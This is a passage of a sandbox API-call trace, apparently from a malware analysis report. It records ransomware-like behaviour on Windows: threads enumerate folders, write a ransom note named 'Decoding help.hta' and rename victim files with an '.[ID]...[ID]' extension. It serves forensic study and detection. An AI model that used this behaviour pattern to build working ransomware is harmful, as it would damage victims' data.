ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db238 [0056.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.941] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.941] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.941] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.941] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0056.941] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.941] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.941] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0056.941] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x20 [0056.941] lstrcmpiW (lpString1="Decoding help.hta", lpString2="background.png") returned 1 [0056.941] lstrlenW (lpString="background.png") returned 14 [0056.941] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.941] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.941] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="background.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" [0056.941] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" [0056.941] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" [0056.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.942] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0056.942] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.942] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.942] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0056.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x20 [0056.942] lstrcmpiW (lpString1="Decoding help.hta", lpString2="behavior.xml") returned 1 [0056.942] lstrlenW (lpString="behavior.xml") returned 12 [0056.942] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.942] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.942] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="behavior.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" [0056.943] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" [0056.943] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0056.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.943] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x298b9870, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x298b9870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x298b9870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0056.943] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.943] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.943] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0056.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x20 [0056.944] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0056.944] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.944] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.944] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" [0056.944] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\decoding help.hta")) returned 0x20 [0056.944] lstrcmpiW (lpString1="Decoding help.hta", lpString2="watermark.png") returned -1 [0056.944] lstrlenW (lpString="watermark.png") returned 13 [0056.944] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0056.944] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned 91 [0056.944] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="watermark.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" [0056.944] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" [0056.944] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]" [0056.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.944] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0056.944] FindClose (in: hFindFile=0x5db238 | out: hFindFile=0x5db238) returned 1 Thread: id = 722 os_tid = 0xf90 [0054.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*", lpFindFileData=0x1c99fd30 | out: lpFindFileData=0x1c99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd42e760, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710f0 [0055.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.998] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x1c99fd30 | out: lpFindFileData=0x1c99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd42e760, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.999] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.999] FindNextFileW (in: hFindFile=0x6710f0, lpFindFileData=0x1c99fd30 | out: lpFindFileData=0x1c99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992c8400, ftCreationTime.dwHighDateTime=0x1bd5de4, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x992c8400, ftLastWriteTime.dwHighDateTime=0x1bd5de4, nFileSizeHigh=0x0, nFileSizeLow=0x967, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10253_.GIF", cAlternateFileName="")) returned 1 [0055.999] lstrcpyW (in: lpString1=0x42887a0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*" [0055.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*") returned 64 [0055.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Decoding help.hta" [0055.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\decoding help.hta")) returned 0xffffffff [0056.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc4 [0060.474] WriteFile (in: hFile=0xbc4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c99fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c99fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.589] CloseHandle (hObject=0xbc4) returned 1 [0061.589] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 723 os_tid = 0xf94 [0054.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0056.270] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.270] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.270] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.270] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.270] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.270] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0056.270] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0056.270] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0056.637] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0056.638] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 89 [0056.638] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0056.638] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" [0056.638] GlobalMemoryStatus (in: lpBuffer=0x1ca9fd10 | out: lpBuffer=0x1ca9fd10) [0056.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aac8fb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x508 [0056.646] CloseHandle (hObject=0x508) returned 1 [0056.647] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0056.647] lstrcpyW (in: lpString1=0x2aaf9080, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device 